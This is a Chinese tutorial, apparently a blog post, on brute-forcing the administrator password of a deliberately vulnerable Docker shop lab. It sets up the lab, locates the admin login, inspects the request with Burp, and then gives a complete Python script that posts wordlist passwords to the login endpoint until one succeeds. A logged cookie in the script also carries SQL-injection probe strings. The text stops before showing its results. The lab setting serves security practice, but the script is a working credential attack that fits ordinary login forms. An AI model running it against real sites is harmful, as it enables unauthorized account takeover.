用python写一个爆破网站管理员密码脚本

拉取环境

靶场环境是docker环境，把docker靶场映射到本机的7777端口，以便访问

docker pull docker.io/zksmile/vul
docker run -d -p 7777:80 --name shop zksmile/vul:secshop_v2

首页：

寻找登录界面

在注用户注册页面发现admin不能注册，猜测admin为管理员账户

通过爆破目录发现 192.168.171.102:7777/admin.php 为管理登录界面

寻找参数

用burp拦截观察http数据包，关于burp的使用可以看这篇文章 DVWA 暴力破解

可以看到用户名密码是用post传输的，密码错误的响应值是 -1，猜测密码正确的话返回值是1

编写脚本

根据以上这些信息进行编写python脚本，代码解释我放到注释里了：

import sys
import requests
import json

logo = r"""
 ____             _         _____                  
| __ ) _ __ _   _| |_ ___  |  ___|__  _ __ ___ ___ 
|  _ \| '__| | | | __/ _ \ | |_ / _ \| '__/ __/ _ \
| |_) | |  | |_| | ||  __/ |  _| (_) | | | (_|  __/
|____/|_|   \__,_|\__\___| |_|  \___/|_|  \___\___|
"""
def brute(url, header ,params):
    i = 0

    #查看文件行数
    with open('passwd.txt','r') as f:
        global lines
        lines = f.readlines()
        lines = str(len(lines))
    username = 'admin'    #这里username是固定的

    #打开密码字典文件
    for passwd in open("passwd.txt"):
        i += 1
        password = passwd.strip()   #strip删除开头和结尾的空格
        payload = {                 #指定post发送的数据
            'loginName':username,
            'loginPwd':password,
            'verify':'DGHA'
        }
        #发送post请求
        response = requests.post(url=url, data=payload, params=params, headers=header)
        #获取结果
        result = json.loads(response.content)

        #如果结果值为1，则密码正确，退出程序!!!
        if result["status"] == 1:
            print('------------------------------------')
            print("\033[92m" + 'password is : ' + password + '\n' + "\033[0m")
            sys.exit()
        #输出测试值
        print("\033[91m" + '[*]' + str(i) + '/'+ lines + ' ' + password + "\033[0m",end='\r')
    return i

def main():
    print(logo)
    #proxies = {'http':'http://127.0.0.1:8080'}
    url = "http://192.168.171.102:7777/index.php"
    #指定user_agent和cookie
    header = {
        'User_Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0',
        'Cookie':'areaId2=110100; WSTMALLviewGoods=think%3A%5B%22102%22%2C%22258%22%2C%22103%22%2C%22101%22%2C%22101%2Bor%2B1%253D1%22%2C%2287654%2Bor%2B1%253D1%22%2C%22101%2Border%2Bby%2B1%22%2C%22101%2Border%2Bby%2B10%22%2C%22101%2Border%2Bby%2B30%22%2C%22101%2Border%2Bby%2B300%22%2C%22101%2Border%2Bby%2B30000%22%2C%22101%2B%2Band%2B1%253D1%22%2C%22260%22%2C%22101%2Band%2B1%253D1%22%2C%22110%22%5D; loginName=test1; loginPwd=NWExMDVlOGI5ZDQwZTEzMjk3ODBkNjJlYTIyNjVkOGE%3D; PHPSESSID=88sjapamh02cbo40fcj9flc1j5; WSTMALLbstreesAreaId3=110101'
    }
    #指定get方式传参的值
    params = {'m':'Admin','c':'index','a':'login'}
    i = brute(url, header, params)
    print('-----------------------------------------------------')
    print("\033[91m" +'尝试了' + str(i) + '次，字典中没有正确密码!' + "\033[0m")

if __name__ == "__main__":
    main()

试验效果

密码错误效果：